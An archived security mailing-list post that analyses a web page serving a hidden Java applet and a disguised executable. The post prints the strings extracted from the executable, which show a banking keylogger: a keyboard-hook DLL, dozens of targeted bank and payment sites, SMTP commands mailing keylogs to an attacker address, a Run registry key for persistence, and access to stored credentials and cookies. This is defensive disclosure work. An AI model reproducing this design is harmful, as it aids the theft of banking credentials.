lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <402FC40D.752.65AE52B@localhost>
From: n.teusink at planet.nl (n.teusink@...net.nl)
Subject: Re: http://federalpolice.com:article872@...5686747

>From the source of that page:

APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1

BlackBox.class is detected immediately by my virusscanner as ClassLoader/E, more 
info:
http://www.viruslibrary.com/virusinfo/Trojan.Java.ClassLoader.htm

The javautil.zip appears to be an exe file renamed to zip. The exe is compressed with 
FSG.

Interresting pieces of output from strings on the decompressed exe:


----------------------------------------------BEGIN
HookerDll.Dll
Install
Uninstall
EDIT
%s\%s
WVS3
	\kgn.txt
Hooker.dll
Install
Uninstall
Westpac
bendigo
Bendigo
e-bendigo
e-Bendigo
commbank
Commonwealth
NetBank
Citibank
Bank of America
e-gold
e-bullion
e-Bullion
evocash
EVOCash
EVOcash
intgold
INTGold
paypal
PayPal
bankwest
Bank West
BankWest
National Internet Banking
cibc
CIBC
scotiabank
ScotiaBank
Scotia Bank
bank of montreal
Bank of Montreal
royalbank
Royal Bank
RoyalBank
tdwaterhouse
TD Canada Trust
TD Waterhouse
president's choice
President's Choice
President Choice
suncorpmetway
Suncorp
macquarie
Macquarie
INTgold
1mdc
1MDC
TD Waterhouse
goldmoney
GoldMoney
goldgrams
pecunix
Pecunix
Pecun!x
hyperwallet
HyperWallet
Wells Fargo
Bank One
Banesto
CAIXA
SunTrust
Sun Trust
Discover Card
Washington Mutual
Wachovia
desjardins
Chase
0+060F0
1$11161J1U1i1
2.2I2\2
3'3,3E3c3h3r3
4%42484>4D4J4P4V4\4b4h4n4t4z4
DATA
EHLO localhost
Subject: KeyLog from (%s)
MAIL FROM:<pentasatan@...l.ru>
RCPT TO:<pentasatan@...l.ru>
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
open
pstorec.dll
PStoreCreateInstance
internet explorer
http://
wininetcachecredentials
Cookie:
----------------------------------------------END

I think you can draw your own conclusions about this file.

Niels


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ